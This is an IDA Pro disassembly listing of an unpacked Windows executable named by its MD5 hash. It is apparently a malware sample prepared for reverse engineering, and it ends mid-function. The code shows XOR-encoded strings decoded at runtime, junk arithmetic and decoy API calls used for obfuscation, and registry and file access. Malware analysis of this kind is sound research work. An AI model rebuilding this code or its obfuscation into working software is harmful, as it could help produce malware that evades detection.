;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6C2AE9D4702B1E25BC14294E4D76B401
; File Name : u:\work\6c2ae9d4702b1e25bc14294e4d76b401_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43EFBD+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40C8B4 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43F017+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407E49+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43C08C, eax
mov dword_43C090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43C090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43C030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43C034, eax
mov eax, [edx+4]
mov dword_43C038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43C03C
mov esi, dword_43C034
rep movsd
lea edi, dword_43C03C
mov dword_43C034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43C010, 0Bh
push 0Bh
call sub_40CC44
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43C010, 8
push 8
call sub_40CC44
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43C010
call sub_40CC44
add esp, 8
push dword_43C010
call sub_40CC2C
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43C02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43C02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_44A4FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43C028
push offset dword_43C024
push offset dword_43C020
call sub_40CBCC
push dword_43C028
push dword_43C024
push dword_43C020
mov dword_43C014, esp
call sub_40C654
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40CBFC
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408ED0+23�p
; sub_408ED0+3F�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C09C
lea eax, ds:41B7B0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 14Bh
xor edi, edi
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012CB: ; CODE XREF: sub_40129C+4B�j
mov eax, dword_43C09C
add eax, edi
lea eax, ds:41B7B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D4h
mov [eax], dl
inc edi
loc_4012E5: ; CODE XREF: sub_40129C+2D�j
cmp edi, esi
jl short loc_4012CB
mov [ebp+var_8], 286h
mov eax, dword_43C09C
add eax, esi
mov byte ptr ds:dword_41B7B0[eax], 0
xor edi, edi
mov edi, dword_43C09C
inc dword_43C09C
mov eax, dword_43C09C
add eax, 5
add eax, esi
mov dword_43C09C, eax
cmp eax, 0E0Eh
jle short loc_40132A
and dword_43C09C, 0
loc_40132A: ; CODE XREF: sub_40129C+85�j
mov [ebp+var_C], 3DBh
lea eax, dword_41B7B0[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40133B proc near ; CODE XREF: sub_408048+118�p
var_14C1C = dword ptr -14C1Ch
var_14C18 = dword ptr -14C18h
var_14C14 = dword ptr -14C14h
var_14C10 = byte ptr -14C10h
var_8 = dword ptr -8
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 14C1Ch
call sub_40C6B8
push ebx
push esi
push edi
call sub_40C734 ; GetCurrentProcessId
mov eax, dword_43C22C
mov [ebp+var_14C18], eax
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F1E0
call sub_40C8CC ; CreateFileA
mov esi, eax
mov ebx, 1CA5h
sub ebx, 77B7h
cmp esi, 0FFFFFFFFh
jnz short loc_40138D
xor eax, eax
jmp loc_401420
; ---------------------------------------------------------------------------
loc_40138D: ; CODE XREF: sub_40133B+49�j
push 0
lea eax, [ebp+var_14C14]
push eax
push 14C08h
lea eax, [ebp+var_14C10]
push eax
push esi
call sub_40C8A8 ; ReadFile
mov [ebp+var_2], 434Fh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push esi
call sub_40C7AC ; CloseHandle
mov [ebp+var_8], 67B8h
mov eax, 79B5h
mul [ebp+var_8]
mov [ebp+var_14C1C], eax
mov [ebp+var_8], eax
xor edi, edi
loc_4013DC: ; CODE XREF: sub_40133B+DC�j
mov eax, 13h
sub eax, dword_43C098
push eax
push offset byte_433FE0
lea eax, [ebp+edi+var_14C10]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_401409
xor eax, eax
inc eax
jmp short loc_401420
; ---------------------------------------------------------------------------
loc_401409: ; CODE XREF: sub_40133B+C7�j
call sub_40C734 ; GetCurrentProcessId
add edi, 11h
cmp edi, [ebp+var_14C14]
jb short loc_4013DC
call sub_40C7D0 ; GetVersion
xor eax, eax
loc_401420: ; CODE XREF: sub_40133B+4D�j
; sub_40133B+CC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40133B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2A0h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C23C
lea eax, ds:41A7F0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-8], 2B3h
xor edi, edi
jmp short loc_401475
; ---------------------------------------------------------------------------
loc_40145B: ; CODE XREF: .text:00401477�j
mov eax, dword_43C23C
add eax, edi
lea eax, ds:41A7F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F6h
mov [eax], dl
inc edi
loc_401475: ; CODE XREF: .text:00401459�j
cmp edi, esi
jl short loc_40145B
mov dword ptr [ebp-0Ch], 25h
mov eax, dword_43C23C
add eax, esi
mov byte ptr ds:dword_41A7F0[eax], 0
mov edi, dword_43C23C
inc dword_43C23C
mov eax, dword_43C23C
add eax, 5
add eax, esi
mov dword_43C23C, eax
cmp eax, 0E06h
jle short loc_4014B8
and dword_43C23C, 0
loc_4014B8: ; CODE XREF: .text:004014AF�j
mov dword ptr [ebp-10h], 20Bh
lea eax, dword_41A7F0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014C9 proc near ; CODE XREF: sub_4061F7+E1�p
; sub_408B4C+128�p ...
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov [ebp+var_4], 19C3h
sub [ebp+var_4], 4EAAh
mov [ebp+var_1], 19h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
lea eax, [ebp+var_8]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CB54 ; RegOpenKeyExA
mov edi, eax
mov esi, 2238h
mov eax, 5994h
mul esi
mov [ebp+var_10], eax
mov esi, eax
or edi, edi
jz short loc_40151F
xor eax, eax
jmp short loc_40156A
; ---------------------------------------------------------------------------
loc_40151F: ; CODE XREF: sub_4014C9+50�j
call sub_40C7D0 ; GetVersion
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40CB60 ; RegQueryValueExA
mov edi, eax
mov [ebp+var_9], 0B0h
movzx eax, [ebp+var_9]
imul eax, 38BBh
mov [ebp+var_9], al
push [ebp+var_8]
call sub_40CB48 ; RegCloseKey
call sub_40C764 ; RtlGetLastWin32Error
or edi, edi
jz short loc_401562
xor eax, eax
jmp short loc_40156A
; ---------------------------------------------------------------------------
loc_401562: ; CODE XREF: sub_4014C9+93�j
call sub_40C764 ; RtlGetLastWin32Error
xor eax, eax
inc eax
loc_40156A: ; CODE XREF: sub_4014C9+54�j
; sub_4014C9+97�j
pop edi
pop esi
leave
retn
sub_4014C9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3A7h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C248
lea eax, ds:4351E0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_4015B4
; ---------------------------------------------------------------------------
loc_40159D: ; CODE XREF: .text:004015B6�j
mov eax, dword_43C248
add eax, edi
lea eax, ds:4351E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 35h
mov [eax], dl
inc edi
loc_4015B4: ; CODE XREF: .text:0040159B�j
cmp edi, esi
jl short loc_40159D
mov dword ptr [ebp-8], 249h
mov eax, dword_43C248
add eax, esi
mov byte ptr ds:dword_4351E0[eax], 0
mov edi, dword_43C248
mov eax, edi
add eax, 6
add eax, esi
mov dword_43C248, eax
inc dword_43C248
cmp dword_43C248, 0DC9h
jle short loc_4015F9
and dword_43C248, 0
loc_4015F9: ; CODE XREF: .text:004015F0�j
mov dword ptr [ebp-0Ch], 114h
lea eax, dword_4351E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40160A proc near ; CODE XREF: sub_405E88+9C�p
; sub_405E88+D9�p ...
var_10 = dword ptr -10h
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
call sub_40C740 ; GetCurrentThreadId
mov [ebp+var_A], 6A47h
add [ebp+var_A], 5A3h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CB3C ; RegCreateKeyExA
mov edi, eax
call sub_40C7D0 ; GetVersion
or edi, edi
jz short loc_401651
xor eax, eax
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_401651: ; CODE XREF: sub_40160A+41�j
call sub_40C7D0 ; GetVersion
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40CB6C ; RegSetValueExA
mov edi, eax
call sub_40C734 ; GetCurrentProcessId
push [ebp+var_8]
call sub_40CB48 ; RegCloseKey
mov [ebp+var_1], 14h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
or edi, edi
jz short loc_401694
xor eax, eax
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_401694: ; CODE XREF: sub_40160A+84�j
call sub_40C740 ; GetCurrentThreadId
cmp [ebp+var_10], 1
jnz short loc_4016A6
mov eax, 2
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_4016A6: ; CODE XREF: sub_40160A+93�j
call sub_40C7D0 ; GetVersion
xor eax, eax
inc eax
loc_4016AE: ; CODE XREF: sub_40160A+45�j
; sub_40160A+88�j ...
pop edi
leave
retn
sub_40160A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C254
lea eax, ds:4383E0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_4016F0
; ---------------------------------------------------------------------------
loc_4016D6: ; CODE XREF: .text:004016F2�j
mov eax, dword_43C254
add eax, edi
lea eax, ds:4383E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 93h
mov [eax], dl
inc edi
loc_4016F0: ; CODE XREF: .text:004016D4�j
cmp edi, esi
jl short loc_4016D6
mov eax, dword_43C254
add eax, esi
mov byte ptr ds:dword_4383E0[eax], 0
xor edi, edi
mov edi, dword_43C254
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C254, eax
cmp eax, 0DEEh
jle short loc_401725
and dword_43C254, 0
loc_401725: ; CODE XREF: .text:0040171C�j
lea eax, dword_4383E0[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40172F proc near ; CODE XREF: sub_4054C8+159�p
; sub_408B4C+74�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C7D0 ; GetVersion
call sub_40C740 ; GetCurrentThreadId
xor esi, esi
jmp short loc_40176B
; ---------------------------------------------------------------------------
loc_401746: ; CODE XREF: sub_40172F+3F�j
call sub_40CC38
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 61h
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_40176B: ; CODE XREF: sub_40172F+15�j
cmp esi, [ebp+arg_4]
jl short loc_401746
mov eax, [ebp+arg_4]
mov byte ptr [ebx+eax], 0
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40172F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 12Bh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C260
lea eax, ds:42FB20h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-8], 283h
xor edi, edi
jmp short loc_4017CB
; ---------------------------------------------------------------------------
loc_4017B4: ; CODE XREF: .text:004017CD�j
mov eax, dword_43C260
add eax, edi
lea eax, ds:42FB20h[eax]
movsx edx, byte ptr [eax]
xor edx, 7Bh
mov [eax], dl
inc edi
loc_4017CB: ; CODE XREF: .text:004017B2�j
cmp edi, esi
jl short loc_4017B4
mov dword ptr [ebp-0Ch], 10Ch
mov eax, dword_43C260
add eax, esi
mov byte ptr ds:dword_42FB20[eax], 0
xor edi, edi
mov edi, dword_43C260
add dword_43C260, 3
mov eax, dword_43C260
lea eax, [eax+esi+3]
mov dword_43C260, eax
cmp eax, 0DEDh
jle short loc_401810
and dword_43C260, 0
loc_401810: ; CODE XREF: .text:00401807�j
lea eax, dword_42FB20[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40181A proc near ; CODE XREF: sub_40133B+BA�p
; sub_40523D:loc_4052A8�p ...
var_24 = dword ptr -24h
var_1E = byte ptr -1Eh
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = dword ptr -11h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_D], 0C0h
sub [ebp+var_D], 75h
and [ebp+var_C], 0
mov eax, dword_43C264
mov [ebp+var_11], eax
and [ebp+var_8], 0
jmp loc_4018EA
; ---------------------------------------------------------------------------
loc_401840: ; CODE XREF: sub_40181A+E2�j
call sub_40C764 ; RtlGetLastWin32Error
and [ebp+var_4], 0
mov [ebp+var_12], 0D8h
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], al
xor ebx, ebx
jmp short loc_4018D0
; ---------------------------------------------------------------------------
loc_40185E: ; CODE XREF: sub_40181A+C7�j
call sub_40C7C4 ; GetTickCount
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_40187D
inc [ebp+var_4]
loc_40187D: ; CODE XREF: sub_40181A+5E�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401885: ; CODE XREF: sub_40181A+70�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401885
cmp [ebp+var_4], eax
jnz short loc_4018CF
call sub_40C734 ; GetCurrentProcessId
inc [ebp+var_C]
mov [ebp+var_18], 5F0h
mov eax, 4B0Ah
mul [ebp+var_18]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_18], eax
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_4018BE
mov eax, [ebp+var_8]
jmp short loc_401907
; ---------------------------------------------------------------------------
loc_4018BE: ; CODE XREF: sub_40181A+9D�j
lea edi, [ebp+var_1E]
lea esi, aO68 ; "o6,%8"
mov ecx, 3
rep movsw
loc_4018CF: ; CODE XREF: sub_40181A+75�j
inc ebx
loc_4018D0: ; CODE XREF: sub_40181A+42�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018D8: ; CODE XREF: sub_40181A+C3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018D8
cmp ebx, eax
jb loc_40185E
inc [ebp+var_8]
loc_4018EA: ; CODE XREF: sub_40181A+21�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018F2: ; CODE XREF: sub_40181A+DD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018F2
cmp [ebp+var_8], eax
jb loc_401840
mov eax, 0FFFFh
loc_401907: ; CODE XREF: sub_40181A+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_40181A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C278
lea eax, ds:4166F0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-4], 2A0h
xor edi, edi
jmp short loc_401952
; ---------------------------------------------------------------------------
loc_40193B: ; CODE XREF: .text:00401954�j
mov eax, dword_43C278
add eax, edi
lea eax, ds:4166F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 1Bh
mov [eax], dl
inc edi
loc_401952: ; CODE XREF: .text:00401939�j
cmp edi, esi
jl short loc_40193B
mov dword ptr [ebp-8], 29Ch
mov eax, dword_43C278
add eax, esi
mov byte ptr ds:dword_4166F0[eax], 0
mov edi, dword_43C278
mov eax, edi
inc eax
add eax, esi
mov dword_43C278, eax
cmp eax, 0DDFh
jle short loc_40198A
and dword_43C278, 0
loc_40198A: ; CODE XREF: .text:00401981�j
mov dword ptr [ebp-0Ch], 0D8h
lea eax, dword_4166F0[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C7D0 ; GetVersion
lea edi, [ebp-6]
lea esi, aVlvh_ ; "vlVh_"
mov ecx, 3
rep movsw
mov ebx, [ebp+10h]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019BE: ; CODE XREF: .text:004019DE�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+ebx]
mov edx, ebx
sub edx, [ebp+10h]
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_4019DA
xor eax, eax
inc eax
jmp short loc_4019E2
; ---------------------------------------------------------------------------
loc_4019DA: ; CODE XREF: .text:004019D3�j
inc ebx
loc_4019DB: ; CODE XREF: .text:004019BC�j
cmp ebx, [ebp+14h]
jl short loc_4019BE
xor eax, eax
loc_4019E2: ; CODE XREF: .text:004019D8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3DDh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C28C
lea eax, ds:4340E0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-8], 38Eh
xor edi, edi
jmp short loc_401A34
; ---------------------------------------------------------------------------
loc_401A1D: ; CODE XREF: .text:00401A36�j
mov eax, dword_43C28C
add eax, edi
lea eax, ds:4340E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 76h
mov [eax], dl
inc edi
loc_401A34: ; CODE XREF: .text:00401A1B�j
cmp edi, esi
jl short loc_401A1D
mov dword ptr [ebp-0Ch], 3E6h
mov eax, dword_43C28C
add eax, esi
mov byte ptr ds:dword_4340E0[eax], 0
mov edi, dword_43C28C
mov eax, edi
lea eax, [eax+esi+5]
mov dword_43C28C, eax
cmp eax, 0DD0h
jle short loc_401A6D
and dword_43C28C, 0
loc_401A6D: ; CODE XREF: .text:00401A64�j
mov dword ptr [ebp-10h], 1E0h
lea eax, dword_4340E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A7E proc near ; CODE XREF: sub_4054C8+51�p
; sub_4061F7+4B2�p ...
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_1], 0C3h
add [ebp+var_1], 29h
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40C8CC ; CreateFileA
mov edi, eax
call sub_40C734 ; GetCurrentProcessId
cmp edi, 0FFFFFFFFh
jnz short loc_401ACF
mov ax, word_43C290
mov [ebp+var_E], ax
cmp [ebp+arg_4], 0
jz short loc_401ACB
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401ACB: ; CODE XREF: sub_401A7E+45�j
xor eax, eax
jmp short loc_401B1C
; ---------------------------------------------------------------------------
loc_401ACF: ; CODE XREF: sub_401A7E+35�j
push 0
push edi
call sub_40C74C ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call sub_40C878 ; LocalAlloc
mov ebx, eax
call sub_40C734 ; GetCurrentProcessId
push 0
cmp [ebp+arg_4], 0
jz short loc_401AFB
mov eax, [ebp+arg_4]
mov [ebp-10h], eax
jmp short loc_401B01
; ---------------------------------------------------------------------------
loc_401AFB: ; CODE XREF: sub_401A7E+73�j
lea eax, [ebp+var_8]
mov [ebp-10h], eax
loc_401B01: ; CODE XREF: sub_401A7E+7B�j
push dword ptr [ebp-10h]
push esi
push ebx
push edi
call sub_40C8A8 ; ReadFile
mov eax, dword_43C292
mov [ebp+var_C], eax
push edi
call sub_40C7AC ; CloseHandle
mov eax, ebx
loc_401B1C: ; CODE XREF: sub_401A7E+4F�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A7E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2A0
lea eax, ds:410820h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_401B5E
; ---------------------------------------------------------------------------
loc_401B47: ; CODE XREF: .text:00401B60�j
mov eax, dword_43C2A0
